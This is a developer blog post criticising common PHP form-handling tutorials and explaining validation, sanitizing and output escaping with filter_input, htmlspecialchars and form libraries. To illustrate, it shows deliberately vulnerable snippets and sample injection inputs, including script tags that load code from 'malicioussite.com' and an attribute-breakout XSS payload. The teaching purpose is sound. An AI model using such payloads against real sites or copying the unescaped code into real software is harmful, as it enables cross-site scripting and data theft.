PHP Forms Worst Practices (at least, not “best” practices)

Several web pages came up when I searched for PHP forms best practices. I figured that the techniques, today, would be have improved.

They hadn’t.

In fact, the Bing search engine turned up pages that I thought described some bad practices.

Prologue

I’ve been porting old software, and while it mostly went well, we hit a weird bug that I just couldn’t figure out. The application had God Classes, and the code was all over the place.

So I started to refactor and fix things. At small scale, the code isn’t that bad. It just lacks any overall structure that makes sense to anyone today.

Eventually, I got to a function that read from $_POST. Form handling is in nearly all legacy code, and it’s often a weak spot, where security can be broken.

The contemporary “best practice”, as I understand it, is to use a form library. There are many PHP form libraries: Formidable, Zebra_Form, Symfony’s forms, Laravelcollective’s forms, Laravel’s forms. The best option is probably Symfony’s, but I don’t know it yet.

However, that’s kind of hard with legacy code, because all the layout, data, and logic may be mixed together.

What’s alarming is how many tutorials out there still instruct people toward using the worst practices.

Worst Practices?

The worst things to do are:

  • using $_POST, $_GET
  • validate using regular expressions
  • or not validating at all
  • not sanitizing the input
  • not escaping (and unescaping) correctly
  • using an escaping filter as a sanitization filter

There are a dozen other things, but that’s more than enough to pick on here.

Don’t use $_POST and $_GET

This is what’s out there:

$x = $_POST['x'];

This is the same:

$x = filter_input( INPUT_POST, 'x' );

But you can do this, and filter for numbers:

$x = filter_input( INPUT_POST, 'x', FILTER_SANITIZE_NUMBER_INT );

That retrieves the data, and then sanitizes it, in one line.

Don’t Validate with RegEx

Don’t validate with a regular expression, except as a last resort. Spot the stupid mistake:

[code]
$x = $_POST[‘x’];
if (preg_match(‘/[0-9]+/’, $x)) {
// use $x
}
[/code]

That regex matches when $x = “1′ OR TRUE”. That’s like an SQL injection attack.

PHP comes with a bunch of validators and sanitizers at the Filter Reference. They make your code shorter, more readable, and safer.

You can use Regexes with one of the filters, as well.

They fail to validate, and use the escaping functions to sanitize input

In the bad old days, we used string mangling to escape potentially malicious code. In fact, PHP used to do it, and it was called “magic_quotes”.

Old PHP input was escaped with backslashes, so the strings could be inserted into a database. This would help avoid SQL injection attacks.

The problem was, you wanted to display this data as well, so a lot of code used stripslashes() to get rid of this escaping.

Of course, when you display stuff to the page, you need to escape it with htmlentities() or htmlspecialchars().

Sometimes, someone would escape the code before storing it into the database. You’d see this:

[code]
$x = stripslashes($_POST[‘x’]);
$x = htmlentities($x);
insert_into_database($x);
[/code]

That’s a mistake. The value of $x should be stored without escaping.

All escaping code should be in the output, just before the output goes to the browser.

Failing to sanitize the input

Sanitizing is different from validating.

Users may type in data that’s slightly wrong, but you can correct it enough to make it good data. That’s what sanitizing, or normalizing, does.

In this example, inputs like “100”, ” 100″, “100 “, and even “100.foobar” all get turned into the integer, 100.

$x = filter_input( INPUT_POST, 'x', FILTER_SANITIZE_NUMBER_INT );

Not escaping the output

We’ve all seen this.

[code]
$name = $_POST[‘name’];
insert_into_db($name);

// then, in another part of the code
$names = select_all_names();
echo $names;
[/code]

It’s terrible.

Someone can post:

name=<script>function(){maliciousjavascript;}()</script>

And that would simply output the Javascript to the page.

What about this:

name=<script src=http://malicioussite.com/evil.js></script>

Oh hell.

This would have fixed it:

echo htmlspecialchars($names);

This works, too:

echo htmlentities($names);

Making the HTML form by hand.

There’s nothing “wrong” with hand-coding forms, unless you are re-filling the form with data.

Here’s a form:

[code]
<form>
<input name=x value=1 />
</form>
[/code]

OK, that’s not so bad. Suppose you want to get the data from the database:

[code]
<form>
<input name=x value=<?php echo $x; ?> />
</form>
[/code]

Oh hell. If the value of $x is:

"1" ><script src="http://malicioussite.com"></script><br

See what happened there? There were no quotes around the values. The output becomes:

[code]
<form>
<input name=x value="1" ><script src="http://malicioussite.com"></script><br />
</form>
[/code]

This is a little better, but still not safe:

[code]
<form>
<input name="x" value="<?php echo $x; ?>" />
</form>
[/code]

The output of that is:

[code]
<form>
<input name="x" value=""1" ><script src="http://malicioussite.com"></script><br" />
</form>
[/code]

That script tag might still be interpreted by the browser as a legitimate tag. You need to escape the output to be safe:

[code]
<form>
<input name="x" value="<?php echo htmlspecialchars($x); ?>" />
</form>
[/code]

That’s enough griping for today… some conclusions

That bit of HTML code up there is pretty long, and that’s why form libraries are necessary: they make the code shorter, and less prone to programmer error. That one line of HTML, recoded in the Laravel Forms library, looks like this:

echo Form::text('x', $x );

That’s actually not quite how it works, but you get the idea. The library writes the HTML, with all the escaping.